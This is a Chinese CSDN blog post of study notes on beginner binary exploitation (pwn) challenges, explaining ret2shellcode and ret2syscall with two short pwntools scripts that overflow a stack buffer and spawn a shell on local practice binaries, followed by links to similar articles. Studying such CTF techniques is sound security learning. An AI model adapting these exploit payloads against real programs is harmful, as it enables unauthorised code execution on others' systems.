PWN简单学习ret2shellcod,ret2syscall

最新推荐文章于 2022-11-12 01:02:32 发布
最新推荐文章于 2022-11-12 01:02:32 发布
阅读量292 收藏 1
点赞数
分类专栏: pwn 笔记 文章标签: stm32
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51974791/article/details/118893394
版权
笔记 同时被 2 个专栏收录
25 篇文章 0 订阅
订阅专栏
pwn
2 篇文章 0 订阅
订阅专栏

test

ret2shellcode

在程序中往往不会直接留给回门程序
这时候可以篡改栈帧上的返回地址为攻击者手动传入的 shellcode 所在缓冲区地址,初期往往将 shellcode 直接写入栈缓冲区。
目前由于 the NX bits 保护措施的开启,栈缓冲区不可执行,故当下的常用手段变为向 bss 缓冲区写入 shellcode 或向堆缓冲区写入 shellcode 并使用 mprotect 赋予其可执行权限。
首先看一下基本信息,是一个32位的
在这里插入图片描述
有一段内存可读可写可执行,这是非常危险的。
虽然NX没有打开但是依然不可以直接把shellcode写入栈,因为往往系统默认开启ASLR。
在这里插入图片描述
在这里插入图片描述
输入的值给到buf2,一个全局变量对应bss段。
在这里插入图片描述
宽度为108再加上4字节覆盖返回地址。
payload:

from pwn import *

io = process("./ret2shellcode")
shellcode = asm(shellcraft.sh())
addr = 0x0804A080

payload = shellcode.ljust(112,b'A')+ p32(addr)
io.send(payload)
io.interactive()

在这里插入图片描述

ROP—ret2syscall

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
同时找到字符串:
在这里插入图片描述
addr_sh = 0x080BE408
要组合成:
在这里插入图片描述
在这里插入图片描述
宽度为108加上4字节
利用ROPgadget来找到相关的汇编代码:
eax:
在这里插入图片描述
0x080bb196 : pop eax ; ret
eax_ret = 0x080bb196
ebx:
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
edx_ecx_ebx_ret = 0x0806eb90
int:
在这里插入图片描述
int_80h = 0x08049421
payload:

from pwn import *

io = process("./ret2syscall")

eax_ret = 0x080bb196
edx_ecx_ebx_ret = 0x0806eb90
int_80h = 0x08049421
addr_sh = 0x080BE408

payload = flat([b'A'*112,eax_ret,0xb,edx_ecx_ebx_ret,0,0,addr_sh,int_80h])

io.send(payload)
io.interactive()

在这里插入图片描述

Sw@9
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2text知识点及例题
weixin_44864859的博客
05-19 1350
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
ret2resolve学习笔记
hl1293348082的专栏
04-02 204
一是做个总结,二是做个备份。上篇文章感谢@大米指出的错误,格式化字符串漏洞还未销声匿迹!!! 0x01 背景知识 在学习之前先了解一下其中必须知道的背景知识,包括动态链接、延时绑定、Global Offset Table、rel_offset等。 动态链接 《 程序员的自我修养 》,力荐此书!!有更好的欢迎分享。 下图是 ELF 的装载过程。 这篇文章主要关注的是动态链接器中的延时绑定,这是动态链接器中的一部分。 没找到上两张图的出处,望告知。再看看 .interp 这个 sec.
ret2shellcode
qq_45691294的博客
12-18 4543
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
PWN】07.ret2syscall
weixin_52553215的博客
11-12 2244
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
BUUCTF pwn wp 41 - 45
fa1c4的blog
10-05 183
cmcc_simplerop ret2syscall 参考 https://rninche01.tistory.com/entry/Linux-system-call-table-%EC%A0%95%EB%A6%ACx86-x64 构造rop执行 read(0, bss_addr, 8) 读取 /bin/sh\x00 execve(bss_addr, 0, 0) get shell 这里有个坑点, v4到ebp的距离不是IDA显示的那样, 需要调试确定, 发现偏移是0x1c from pwn im
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
azraelxuemo的博客
03-09 6461
What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到syscall,可以考虑利用这种攻击手法 而且现在有些题目出现沙盒,seccomp机制会ban掉一些函数,然后一般会允许使用open,read,write,就可以用读文件方法获取flag pwn题思路 一般如果看到沙盒或者出现syscall可以考虑使用这种攻击手法 例题 [极客大挑战 2019]Not Bad 保护机制 看上去没有任何保护,栈可写可执行 进入之后发现有这么一
linux shell - broken pip error
飞奔的熊猫
01-07 1020
【基本介绍】 这里我们介绍发生broken pipe错误的原因以及解决方案。 【broken pip error】 例如:svn log svn://xxxx | head -10 这样bash在执行的svn log svn://xxxx的时候起一个线程1,在执行head -10的时候起一个线程2。两个线程同时运行。线程2读到第10行的时候退出,然后关闭管道。但是线程1还在跑,继续往管...
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2795
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
基本ROP之ret2text
至臻求学,胸怀云月
01-12 1318
(IDA分析存在错误,抠了一天终于在大佬的帮助下抠出来了) 背景 当程序开启NX保护之后,直接向栈或堆上注入代码的方式难以发挥效果(数据页不执行操作) 提出绕过操作: ROP(Return Oriented Programming) 主要思想是:在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets),来改变寄存器或者变量的值,从而控制程序的执行流程。 所谓 gadgets 就是以 ret...
CTF--PWN--作业记录之02-ret2text(仅做个人课程学习作业记录,可能对各位帮助不大)
weixin_43594719的博客
10-15 420
【步骤一】打开XShell后,查看目录,使用cp命令将实验素材拷贝到当前目录中。 【步骤二】使用ls -al命令查看02-second文件夹的权限,没有问题。 【步骤三】切换到02-second的目录下,查看其中的文件的权限,发现文件second的我们没有执行权限。 【步骤四】使用命令chmod +x second给second加上执行权限 【步骤五】使用命令cat second.c查看源代码,分析一下发现此代码在正常情况下永远执行不到haha(),但在haha()中有我们想要执行的语句system
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2023
pwn 入门
缓冲区溢出-CTF-PWN
04-28
<img src="https://img-bss.csdn.net/202004281305056475.jpg" alt="" />
PWN --- ret2shellcode
qq_41696518的博客
06-28 845
PWN ret2shellcode
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3127
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn ret2libc原理
最新发布
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值